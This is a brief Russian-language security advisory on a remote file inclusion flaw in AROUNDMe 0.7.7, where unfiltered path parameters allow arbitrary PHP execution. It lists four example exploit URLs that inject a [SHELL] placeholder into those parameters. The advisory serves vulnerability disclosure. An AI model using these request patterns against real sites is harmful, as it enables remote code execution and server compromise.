Программа: AROUNDMe 0.7.7
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «language_path_core» и «template_path_core» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]